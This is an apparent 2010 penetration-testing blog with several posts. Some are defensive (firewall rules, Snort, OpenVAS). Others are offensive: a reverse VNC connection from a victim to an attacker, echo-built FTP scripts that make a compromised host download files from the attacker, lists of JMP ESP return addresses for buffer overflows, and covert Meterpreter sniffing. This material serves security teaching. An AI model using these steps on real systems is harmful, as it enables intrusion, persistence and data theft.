Monday, 20 December 2010

Example iptables firewall ruleset for Backtrack 4

When pen-testing, it is quite common to be placing your attack system in a hostile environment, on the internet side of a border-router for example.

During your testing it is likely that you will be holding some confidential information on your system. You need to make sure that your system is secure, otherwise you may learn what it is like to get pwned, the hard way.

However, you do need to strike a balance and be able to communicate with the target system, and allow some ports to be opened, just for services that are going to assist you in compromising that host or network.

Backtrack 4 (like many Linux platforms) has iptables, but some people forget to turn it on, thinking that they are sure to be protected if they don't run any vulnerable services. Take great care.

To ensure some degree of safety, I would recommend:
  • Change your root password to something strong (don't forget your default MySQL password also)
  • Make sure you don't install any services that automatically start each time you boot.
    • If you install any new services (vsftpd for example) prevent them from starting on boot by editing the links in /etc/rc2.d/...
    • Only start services when you need them
    • Watch what you keep in your FTP share and www root etc.
  • Use a firewall, with a restrictive rule-set
    • Only open ports when you need them
    • (Which is what I am going to discuss here...)
Useful guide to iptables

Here is a good article to show you the basics of iptables configuration.

Saving and retrieving firewall rule-sets

iptables rule-sets can be saved and retrieved with the following commands:


iptables-save > /etc/iptables.rules


iptables-restore < /etc/iptables.rules

Using this technique means that you can pre-build several rule-sets and switch between them easily, or have a file that you edit and reload to add, remove or change rules.

Here is an example which provides a reasonable level of protection. It also contains some useful rules, commented out, which could be quickly added.

# Example iptables firewall rule-set for Backtrack 4
# To use uncomment or add any relevant ports you need and run:
# iptables-restore < /etc/iptables.rules.shieldsup


# Established connections are allowed

# Connections from your local machine are allowed
-A INPUT -i lo -j ACCEPT

# Uncomment inbound connections to your own services, or create new ones here:
#-A INPUT -i eth0 -p tcp -m tcp --dport 80 -j ACCEPT # HTTP port 80
#-A INPUT -i eth0 -p tcp -m tcp --dport 443 -j ACCEPT # HTTPS port 443
#-A INPUT -i eth0 -p tcp -m tcp --dport 4444 -j ACCEPT # Standard reverse shell port
#-A INPUT -i eth0 -p tcp -m tcp --dport 21 -j ACCEPT # FTP port 21
#-A INPUT -i eth0 -p udp -m udp --dport 69 -j ACCEPT # FTP port 69

# Drop everything else inbound

# Your own client-side-initiated connections are allowed outbound

# Drop everything else outbound

# For more info visit

More targeted rules bypass rules for the basic rule-set

In addition you may want to add more targeted rules, for example so that only a single host can access a payload that you have hosted on your web-server.

In that case you may want to add a more specific rule in the following way: 

iptables -I INPUT -p tcp -m tcp -s a.b.c.d/32 --dport 80 -j ACCEPT

So for example to add inbound rules so that a target can access your http server and a handler you have listening on port 443, type in the following rules:

iptables -I INPUT -p tcp -m tcp -s --dport 80 -j ACCEPT
iptables -I INPUT -p tcp -m tcp -s --dport 443 -j ACCEPT


Don't forget to test your rule-sets are working from an external host before you rely on them in a live situation!

Look after yourself ;o)

Thursday, 16 December 2010

Setting up a reverse VNC connection (linux version)

If you are reading this, you have probably heard of a reverse shell, where an attacker uses a buffer overflow (or some other exploit) to connect from the victim back to an attacking system, who has a public IP address (perhaps bypassing a NAT or Firewall rule-set).

A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC can be useful.

If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.

This article is only intended for educational purposes. Please do not use this to try to bypass security controls.

How to set this up

In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.

On the attacking system (which has a public IP address) start vncviewer as follows:

vncviewer -listen

You should get a response something like:

vncviewer -listen: Listening on port 5500

On the target system, you can start the VNC server and enter a password as follows:

vncserver :1

It is then possible to use vncconnect to connect the local vncserver on the target system, back to the attacker system:

vncconnect -display :1 :5500

This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attackers desktop.

Of course, these connections could be run on different ports (dependent on firewall rules) redirected with port-redirectors, or tunneled over other protocols, perhaps SSL using stunnel for example.

Similar solutions are just as easy with Windows systems, so definitely something to be aware of.

  • When definining Firewall rules, it is very important to focus on outbound rules (in addition to inbound rules)
  • Outbound connections should be logged and monitored to help identify hackers, virus infection, and technical employees trying to bypass security restrictions.

Sunday, 12 December 2010

Can Google really be used as a proxy server - to avoid detection?

I've seen it mentioned in various places, that Google (and other search engines) could be used as a pseudo proxy-server, to avoid content security solutions, or to avoid direct contact with a target website.

Why might someone want to do this?
  1. To bypass filtering controls such as URL-based web filters, which are deployed internally by many companies to enforce acceptable usage policies.
  2. To footprint a site or organization, before an attack, without contacting the site directly or leaving any traces of the attackers IP address in the sites http or firewall logs.
  3. As a way to obfuscate direct URL attacks such as RFI and LFI, directory traversal, SQL injection etc, again without leaving any traces of your IP address in logs.
I.e. for privacy or hiding malicious intent.

Do not use these techniques for malicious purposes, this article is for education only.

There are three methods that I have explored which we will look at here.
  • Google cache
  • Google translation service
  • Google wireless transcoder
I will briefly discuss the limitations of these techniques. I use for the examples in this article - purely as an example.

Google's cache

So, when you search for a site in Google, you can either go to the site, or view the content that Google cached from the site the last time Googlebot was there.

All very well and good, and certainly lots of the content does come from the Google cache, rather than the original server.

Your content could be accessed more directly with a URL such as:

However, depending on how much Google has cached (which is variable and site-dependent) not everything comes from cache. For example images and such often come from the original sites themselves.

So this would likely trigger logging and content security solutions. (Not exactly "low profile".)

One way to avoid direct contact with the site would be to add a dummy host entry to the hosts file on your system, to avoid ever going to directly (in our example):       localhost       backtrack bt

The cache content is static, so not possible to use for URL attacks as far as I can see.

Google's translation service

The Google translation service is pretty handy if you want to view a foreign language site in your own language.

This feature could also be misused as a proxy. In this example we translate an already English site from Korean to English.

We would choose a language such as Korean, Japanese etc, so that there are no substitutions for our English content. (The English text is left as is.)

i.e. (source language) sl = ko, (translated language) tl = en, (URL) u =

Obviously, as with using the caching example above, this method can remove some content, such as video from the pages.

Unfortunately images will still often be referred, and still hosted on the original site, so could trigger logging and content security, so adding a host entry (as above) would prevent direct contact.

Google's wireless transcoder

Google has a wireless transcoder, to reduce web content size in preparation for delivery to small wireless devices such as phones, iPhones and Blackberries.

This application is accessible here

This is a good one if you are just after some text from a site, but the service can also shrink images for some sites (so these shrunken images will come from Google rather than the original site).

The content is very cut-down (and the structure significantly changed as a result) but it all comes from Google rather than the target site, which could be an advantage.

Is it possible to pass parameters?

So, is it possible to pass parameters in a URL using these methods?

Google cache - nope

Google translation service - an example search on ebay:

Google wireless transcoder - an example search on ebay:

Which would suggest that URL attacks may be possible using this method.


These are interesting techniques but not particularly effective in my opinion. If you are looking for privacy it would be far more effective to use an anonymous web proxy, or use TOR networking (or both).

It may be possible to use these techniques to bypass some content security solutions, but there are mitigations.


It may be possible to block Google translation, cache, and wireless transcoder on a company content security solution. This may go some way to limiting this type of obfuscation, but would cause some functionality limitations.

How to get information from Google to pursue and track criminals

Of course, if you are thinking of using these techniques to aid illegal techniques such URL-based attacks, then don't.

Remember that law enforcement frequently request and obtain log information from companies like Google (though it is unclear how much of this information is actively logged).

If you have additional questions about obtaining legal information from Google, then you can contact them at
legal-support <-at-> google <-dot-> com

Subpoena and legal requests could be sent to:

Attention: Custodian of Records
Google, Inc.
1600 Amphitheatre Parkway
Mountain View
CA 94043

Tuesday, 7 December 2010

How to use snort on Backtrack 4: Basic examples with a test attack

Snort is a very well known intrusion detection system (IDS) which can be very powerful in detecting malicious attacks against a system or network.

One of the big advantages of using it is that it is free and open-source.

Snort can be a little tricky to understand and use for the beginner, so here I discuss some basic usage, as well as showing some "practice" attacks (run snort on one system, and attack it from a second system to see what it looks like)

Please remember to use these techniques for legitimate defensive and testing purposes, and not maliciously. Every action you take has consequences, and you will be heir to the results of your actions.

I am using snort on Backtrack 4 R2, as it is pre-installed and configured for convenience.

Smart packet filter and rule-set

Essentially snort is just a packet filter, like tcpdump or tshark (wireshark). The power of snort is within its rule-based engine, which is able to filter packets, look for attack-signatures, and alert on them.

First I will run snort and tcpdump side by side in their most basic format, and we will see what we can capture.

Packet filter: tcpdump and snort comparison

Look at this quick comparison of tcpdump and snort where I started both applications, and pinged them once (my target system is, and I sent a ping from

tcpdump -i eth0 host

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
14:32:16.272777 IP > bt.lan: ICMP echo request, id 10525, seq 1, length 64
14:32:16.272804 IP bt.lan > ICMP echo reply, id 10525, seq 1, length 64

snort -q -v -i eth0

12/07-14:35:30.674241 ->
ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:84 DF
Type:8  Code:0  ID:12829   Seq:1  ECHO

12/07-14:35:30.674269 ->
ICMP TTL:64 TOS:0x0 ID:16338 IpLen:20 DgmLen:84
Type:0  Code:0  ID:12829  Seq:1  ECHO REPLY

If you look closely you will see that, with the preceding options, you get more or less the same output from both tcpdump and snort. We can see that we are getting an ICMP echo request from, and replying.

Detecting signatures with snort

Now we will edit the snort configuration to enable some rules (probably best to make a backup copy of "/etc/snort/snort.conf" before you try this.

I am going to configure snort on my target system. I edit /etc/snort/snort.conf and comment out the following lines by adding a "#" in front

var HOME_NET any

...and add the following lines

var HOME_NET # Test target system
var EXTERNAL_NET # Test attacker system

These lines effectively tell snort what is inside (and outside) your protected zone.

Detecting port-scans

Now I will enable a rule to detect port-scans. Port-scans are usually the first active component of an attack, so a good idea to monitor for these.

Near the end of the "snort.conf" file in the rules section, uncomment the following line:

include /etc/snort/rules/scan.rules

Now we will start snort on the target, and then run a standard nmap scan from the attacking system

snort -q -A console -i eth0 -c /etc/snort/snort.conf


This produces a huge amount of alerts to the screen. Each alert in this example is saying something along the lines of:

12/07-15:05:34.012119  [**] [1:2000537:6] ET SCAN NMAP -sS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} ->

However, if you were to simply scan a single port with the following nmap command, this would not trigger an alert.

nmap -sV -sT -p T:80

This is because thresholds are used in the scan signature, in order to separate legitimate connections from port-scans. The real skill in using snort, is in configuring the rule-set to only trigger for real issues, and ignore legitimate traffic.

Malicious payloads

OK, so I will disable the scan rules, and try something a little more aggressive.

I will uncomment the following rule to enable it, and see if we can trigger it:

include /etc/snort/rules/ftp.rules

On the target system I will start an FTP server (I am using vsftpd, a version which has no known exploits, just for testing this attack). I then attack the FTP server on the system using the Metasploit db_autopwn method.

This is a very noisy attack, because using db_autopwn will basically scan for any open ports, and then launch all exploits which happen to match the port information found (more detail on how to run this attack here).

So, what did we see on the target system? Certainly many exploit attempts triggered alerts.

12/07-15:48:06.820726  [**] [125:7:1] (ftp_telnet) FTP traffic encrypted [**] [Priority: 3] {TCP} ->
12/07-15:48:21.217972  [**] [1:2417:4] FTP format string attempt [**] [Classification: A suspicious string was detected] [Priority: 3] {TCP} ->
12/07-15:48:21.217972  [**] [1:1377:17] FTP wu-ftp bad file completion attempt [ [**] [Classification: Misc Attack] [Priority: 2] {TCP} ->
12/07-15:48:21.217972  [**] [125:2:1] (ftp_telnet) Invalid FTP Command [**] [Priority: 3] {TCP} ->
12/07-15:48:35.448702  [**] [1:8415:2] FTP SIZE overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} ->


It is definitely picking up some nasties, and alerting us to tell us which IP address is the source.

False positives

Interestingly, whilst I was running this test, and writing this blog, I also got some false positives:

12/07-15:53:53.638563  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->
12/07-16:01:59.533010  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->
12/07-16:02:57.275727  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI DIRECTORY [**] [Priority: 3] {TCP} ->


This false-positive situation is quite common, as I have not done any optimization at this stage. ( is actually a server at This is not a threat, this is part of me writing my blog, that has somehow triggered a rule in my configuration.

Deploying snort in a network

Running snort in this way (IDS) does not stop exploits, but it would alert you to potential attacks that you may otherwise be unaware of.

To block attacks you would need to run snort in IPS mode (Intrusion Prevention) which involves running snort inline, and dropping malicious packets. Maybe a blog for another time.

This test is with snort in a single host scenario. Typically in a network deployment you would use a span-port on a switch, and connect a system running snort to the span port, so that it could "see" all the traffic on that subnet.

Additional configurations would include; deploying logging and alerting in a more resilient and manageable way, such as syslog or mysql.


In summary, intrusion Detection/Prevention (IDS/IPS) is an important part of a defense-in-depth strategy for secure environments.

Snort is essentially free, though needs a considerable amount of configuration and monitoring, in order to ensure that it is properly optimized - detecting threats, but not wasting time/resources by generating false positives.

(Please leave a comment if you found this exercise helpful)

Friday, 3 December 2010

Data mining Backtrack 4 for buffer overflow return addresses

So, if you are reading this blog you are probably aware of the online exploit database sponsored by Offensive Security, which currently holds over 15,000 exploits, from the present back to the mid 1990's.

There are some advantages to using this database online, such as the ability to download some of the vulnerable applications for testing purposes.

However, there is already a local copy of all of these exploits on Backtrack 4, held in /pentest/exploits/exploitdb and subdirectories - which has some other advantages we explore here i.e. mining it for useful information.

The advantages of a local copy of the database

In addition to the convenience of having the exploits already downloaded, there are other things that you can do by having a local copy. (A few weeks back, I used this local copy to do some analysis of Language trends in exploit development )

Here I am going to explore a couple of ways we could retrieve previously found return addresses, using the knowledge stored in files on backtrack.

Updating the exploit database

First get your copy of the exploit database up-to-date.

cd /pentest/exploits/
svn co svn://

You should see the new files and changes whiz past as you get your copy of Backtrack up to the latest revision of the exploit database.

Basic exploit searches

Cool, so we will test the update by looking for something recent in the index file. I will do a quick search for an exploit from this week, the ProFTP remote root exploit.

cd exploitdb
grep -i "ProFTPD" files.csv | grep -i "remote root"
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
15449,platforms/linux/remote/,"ProFTPD IAC Remote Root Exploit",2010-11-07,Kingcope,linux,remote,0

There are a few in there, but I have highlighted the one from this week (15449) in red.

Searching for specific code within the database

We are up-to-date, so what interesting things can we do with all this exploit data?

How about we search all the files for some piece of information we might want to know?

Let's take the example of looking for "JMP ESP" addresses (used in buffer-overflows to control code execution). Quite often, good information on this is available in the comment sections of the exploits.

First we will search for all the files that might contain offset addresses, using fgrep to recursively search and list any files containing the phrase "jmp esp":

fgrep -r -l -i "jmp esp" *

This produces a long list of files (including some I don't want)

...truncated for brevity...

 ...truncated for brevity...

We will filter out anything with "svn-base" and count what we have left:

fgrep -r -l -i "jmp esp" * | grep -v "svn-base" | wc -l


Extracting and filtering the data

We have 232 files potentially containing "jmp esp" addresses, let's grab those suckers.

We'll wrap our filenames in a "for" loop, to pull just the lines we want, out of the files we are interested in.

for file in $(fgrep -r -l -i "jmp esp" * | grep -v "svn-base"); do grep "jmp esp" $file; done

This produces a big blob of data, but, say we are interested to find addresses for Windows XP SP 2:

for file in $(fgrep -r -l -i "jmp esp" * | grep -v "svn-base"); do grep "jmp esp" $file; done | grep -i "Win XP SP2"

[ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp user32.dll 

$ret = "\xED\x1E\x95\x7C"; #jmp esp en ntdll.dll,win xp sp2(spanish) 
"\xb3\x57\x04\x7d"  # jmp esp @ shell32.dll - Win XP SP2

Well, that gives 3 options, one for Spanish, two for English. Pretty handy if you don't happen to have a Windows XP SP2 system lying around waiting to help you develop your exploit for that version - all thanks to exploit developers who comment their code nicely.

(there are several more if you mess with the final grep expression to try different ways of writing "WinXP sp2").

Mining Metasploit

Of course, you could run similar operations on the Metasploit modules. First update Metasploit:


Then we can run the following command (which gives another handy set of return addresses):

for file in $(fgrep -r -l -i "jmp esp" /pentest/exploits/framework3/modules/*); do grep -i "jmp esp" $file; done | sort -u | grep -i "xp sp2"

  #0x773f346a # XP SP2 comctl32.dll: jmp esp
 #[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
 'Ret1' => 0x00420B45, # jmp esp on XP SP2 (iexplore.exe)
 'jmp esp' => 0x774699bf, # user32.dll (xp sp2 and sp3)
 [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll
 [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en
 [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
 [ 'Windows XP SP2 Pro German', { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP
 [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
 [ 'Windows XP SP2 Universal', { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP
 [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
 ['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
 ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
 ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp

Of course you can add the grep -B or -A options, to get lines before and after the line containing what you searched for.

There are probably many other uses for this type of searching. Looking for strings like "jmp esp" is just one example.

Please leave a comment if you find this helpful, or if you can think of any other applications for these techniques.

Thursday, 2 December 2010

ProFTP; site compromised, and code backdoored

Rather interesting news from ProFTP this morning. It sounds like a 0-day vulnerability was found in their software recently.

Attackers then proceeded to attack ProFTPs own FTP servers using the 0-day exploit. The attackers then altered ProFTPs source code to insert a backdoor.

More detail here.

Some users have downloaded the compromised software from ProFTPs site. Very nasty.

I always use vsftpd, and I would highly recommend it, as it has has been designed specifically with security in mind. If you are hosting important files on an FTP site, then you need to make sure it is secure, and that nobody can either compromise the server, or tamper with the files on the server.

Maybe ProFTP should use vsftp for their FTP servers ;o)

It's no joke, as I would say that there is certainly some benefit to using another product (other than the one you produce) especially if you are hosting your product "on your product" so to speak.

This is not the first time vulnerabilities have be found in ProFTP. There have been several over the years. If you use ProFTP, my advice is to use vsftp instead.

Wednesday, 1 December 2010

Vulnerability scanning with OpenVAS

If you are a Sysadmin, IT Manager or Security Manager, you need to protect your network. You need to know where your weaknesses are, so that you can put together a plan to fix them.

You are a busy guy, and the business where you work doesn't really want to spend all it's hard-earned cash on vulnerability scanning software (without good justification). If you can't justify a full external pentest (EPT) or internal vulnerability assessment (IVA), you are the guy on the ground, and your companies' security is your problem.

Increasing costs

Vulnerability scanners can be expensive. Nessus (which used to be free) is now a pay-for subscription-based service, and other scanners such as SAINT are not cheap either.

Core-impact for example is an awesome piece of software, well worth purchasing if you are a professional Pentesting company with lost of clients, but way outside the IT Security budget of most companies.

Free solution

So, thank goodness for open-source software; OpenVAS to the rescue.

Here we take a look at the basic setup process, using OpenVAS on Backtrack4, and do some scans to see what results we get, and how useful they are.

Setting up and updating OpenVAS

Before we start, it is very important that access to your vulnerability scanner is secure. This system is going to hold all the data from your scans. It will hold information detailing vulnerable systems, systems with configuration errors, weak passwords, missing patches etc. You definitely don't want this information to fall into the hands of an attacker.

Using OpenVAS

I will cover here getting OpenVAS setup on Backtrack from the command line, because it looks to me that this is the easier way to use it in the long run.

Setting up the credentials

First create a certificate for your server (such that the communications are secured)


(Accept the defaults for testing purposes, or fill in the details correctly, the choice is yours)

Now we will create a user for administration


Enter a user, select password as the authentication method, set a password, and skip the rule creation with Ctrl-D. Don't forget this username and password, we will need it below, and in the future for running further scans and accessing scan reports.

Updating the OpenVAS signatures

Next we need to update our scan signatures, which can be done as follows.


You will see lots of information whiz past as the updates are performed. This may take a few minutes to run, so be patient.

Starting the scanner and performing a scan

Once you have downloaded the latest updates, you can start the scanner and client, and do a basic scan.

First we need to start the scanner:


You will see the plug-ins being loaded, which should take minute or so on a fast system (If this takes a long time you should consider the hardware you are running this system on. It needs some power)

To open the client interface type:


To run our first scan, click on the "Scan Assistant" top left. Give the task a scope and name, add the subnets or hosts you want to scan, and then click "execute". (I suggest starting with a single host)

Authenticating to the scanner to start the scan

The dialog will ask you to authenticate to the scanner with the credentials you supplied above.

If you get an authentication failure (I have had a few issues with this dialog at times) check that your scanner is running on port 9390 by running the command:

netstat -antp | grep 9390

If not stop, and start it again with the following commands:

pkill openvassd

Scanning progress

You will see a blue progress bar (the UI may then hang for a bit, but that will clear) confirm with OK, and your scan should start shortly.

You should then see the scan dialog below. Depending on the number of hosts you are scanning, this may take a long time to complete. Be patient.

I advise starting by scanning small numbers of machines, and then work up to larger groups as you get more familiar with it, and progress in experience.

The report

When the scan completes, you will get a report. The items that need urgent attention will be detailed with a "no entry" sign. There will likely also be warnings and other informational messages.

Bear in mind, that whether vulnerabilities pose a real threat is very much dependent on the location and purpose of the systems in question.

Are the threats real?

I have often seen false positives in vulnerability scans where, after further investigation, the highlighted threats simply do not exist, so take care to examine the reports with a questioning mind. Often there are non-issues flagged. This is where analysis, experience, knowledge and evaluation come into play.

Additionally, many companies will have lots of internal systems that have numerous services running on them. These may be flagged as having potential vulnerabilities, though this may not be a relevant issue if the systems are running purely in an internal LAN environment (As long as there are no attackers on the internal LAN).

However, if public facing systems, that have firewall ports open to the internet, have similar vulnerabilities, then this is much more of a problem, and would likely need to be addressed as soon as practical.

In short, all these vulnerabilities need to be put into context and prioritized - You don't want to spend all of your time fixing non-problems, you need to prioritize and focus on the most pressing issues.

Planning remediation

Now you have found all these problems, and prioritized the most urgent issues, it is time to have a chat with your management team, and get some focus and agree timescales/resources to fix them.

OpenVAS is not a "magic" solution

Take all this with a pinch of salt though; vulnerability scanners are automated systems, and are limited in their scope and flexibility.

Vulnerability scanning is not the same as penetration testing, and a skilled Pentester or Ethical Hacker will likely find many issues that a automated vulnerability scan would miss (I certainly have)


The issues found are usually remedied by the normal cornerstones of IT Security best practice:
  • Patch management
  • Configuration managment
  • Replacement of legacy/unsupported software
  • Choosing secure software
  • Strong passwords
  • Clear policies and procedures
  • User education

Tuesday, 30 November 2010

Some thoughts and analysis of the Wikileaks "Cablegate" situation

The current Wikileaks "Cablegate" case is interesting on a variety of IT Security topics, especially around access control, and the effect that Web 2.0 can have on confidential and secret information.

From a data security perspective, I feel that this is a relatively new situation that is catching the US government off-guard. Certainly it is a situation brought to a new level by the internet (and the public's desire to read about political gossip).

I will stay away from the politics, but here are some of my thoughts about the data, and the data security, in brief.

Very worrying for the US Government

This is a very worrying situation for the US Government. Data loss of this magnitude and media interest is unprecedented. I feel that this situation is likely to cause political diplomacy issues for some time to come.

I am sure that US data security will be tightened as a result (so some good will come of it) perhaps with new legislation. Meanwhile the information contained in the cables is getting frontpage coverage on every national newspaper worldwide.

The Wikileaks Cablegate data online

Wikileaks have certainly spent a lot of effort making the data available, with multiple mirrored websites.

The data is getting indexed (and cached) by Google, making searching very powerful if you know how to use Google operators.

For Google searching, it would be possible to use expressions like the following for example

...but then if you know your Google operators, you could probably combine that with something more focused.

As I said, the data is also being cached by Google (and other search engines) so if the sites were to be taken down, then it may still be possible to access the information by clicking on the "cache" links provided by Google.

It is interesting that data never really goes away on the internet, once it is out there, it is out there, and there would be no way of removing all of the instances of the data, no matter how hard someone tries.

Release of information rate, and data-cleansing

The release of new information is rather slow. I suspect this is due to the data-cleansing that Wikileaks are currently doing (they seem to be removing names of individuals from the data before publication, except for names of senior politicians and leaders, though I am not sure what the logic behind that is).

With just over 0.1% of the data currently hosted, and a small dribble of new data each day, I feel that it is going to take a massive amount of effort for Wikileaks to publish the data. They are talking about sanitizing a quarter of a million documents, an enormous task!

I would estimate it will take several years to release all the data at this rate. It's a huge project, and will take considerable time and resources to complete. Meanwhile, news keeps coming with each release, and some of the press have their own copy of the data (Though I think people will get bored of it within 6 months, if Wikileaks lasts that long...)

Denial of service

I saw a tweet earlier in the week (right after the launch of the Cablegate data) that Wikileaks described that their systems were under attack from a distributed denial of service attack (DDoS).

This may be the US Government, or third parties acting on behalf of, or completely independently of them. I am sure this situation will change rapidly over time, such is the nature of DDoS and defenses against it.

The platform

Interestingly, looking at the DNS records, I can see that Wikileaks are currently hosting part of the Cablegate site on Amazon EC2 (certainly one of their mirrors I checked the DNS for at is located at the Seattle Amazon EC2 location). Other servers are currently located in France.

If the US do decide to pull-the-plug on Wikileaks, then I would think it would be relatively straightforward for the current platform. Whether this could be classed as "political censorship of the web" is open for debate - but as I said, I will stay away from the politics.

Anyway, I feel it would be easier to take the current platform off-line by political pressure, negotiations with vendors, and legal means rather than DDoS.

However, it would likely just pop up somewhere else - such is the nature of the internet. Once the data is out there it will not be deletable.

Also, the small amount of data released so far is easily available via bit-torrent among other file-sharing methods.

Cable data

It seems that the cables are each quite small pieces of data, like telegrams. The cables are very compact and concise, apparently being typically around 1,000 words (around 6K each).

If this is representative of the rest of the data, then this would put 250,000 documents at a size of around 1.5GB. However, due to the nature of the data, I would say that it would compress at a good ratio (with Winzip for example) perhaps down to 500MB, so easily would have fit onto a memory stick, SD card, recordable CD or DVD.

In other words, with todays technology a quarter of a million cables are surprisingly portable. Perhaps this is how it was stolen (it has been suggested in the past that a CD-R format was used by Bradley Manning, and that this is where the data came from).

Need to know

Mitigations for this leak should have been better (my opinion). From a data governance perspective, It looks like there has been a huge failing in the application of "least privilege", i.e. the "need to know".

I have seen reports that suggest that up to 1 million US military, and law enforcement personnel may potentially have had the level of access required to view some of this data. If true, that is an incredible situation and no surprise that something this damaging has happened.

I doubt this is true, but in any case, access control and data loss prevention seem to have been lacking - I am sure this is currently in urgent review!

Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems)

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake and run an interactive program, and then loose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straight-forward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non interactive shell?

In these examples our attacking system ( has an FTP server running, hosting our malicious files (in this case, test.txt)

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:

echo open 21> ftp.txt
echo anonymous>> ftp.txt
echo>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.

type ftp.txt

open 21

get test.txt

This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.

FTP in a non-interactive shell to a Linux system

Normally the FTP command shell on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work.

echo "#!/bin/sh" >>
echo "HOST=''" >>
echo "USER='anonymous'" >>
echo "PASSWD=''" >>
echo "FILE='test.txt'" >>
echo "" >>
echo "ftp -n \$HOST <<BLAH " >>
echo "quote USER \$USER" >>
echo "quote PASS \$PASSWD" >>
echo "bin" >>
echo "get \$FILE" >>
echo "quit" >>
echo "BLAH" >>
echo "exit 0" >>

When pasted into a non-interactive shell the above commands will produce a script file on the remote vicitm, "".


ftp -n $HOST <<BLAH
quote USER $USER
get $FILE
exit 0

To check, and run this script, simply execute the following commands:

chmod 777

...and this will use FTP to download our test file to the target system.

Using this technique it would be relatively easy to put additional files on the victim system, such as; connectivity tools, privilege-escalation exploits, back-doors, and also copy files from the victim system using the same method (with a put rather than a get).

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.

cat | sed 's/^/echo "/' | sed 's/$/" >>' | sed 's/\$/\\\$/'> ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).

Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foot-hold by compromising and initial host, one of the first things he needs do is some basic host and network reconnaissance in order to see "where he is" and "what he can do next".

One of the techniques that could be used, is passive network reconnaissance, i.e. packet-sniffing to "listen" to the victims LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.

Please remember to use these techinques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN  traffic can be very useful to an external attacker, to assist in information gathering and compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile so installing an application where it does not exist previously is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
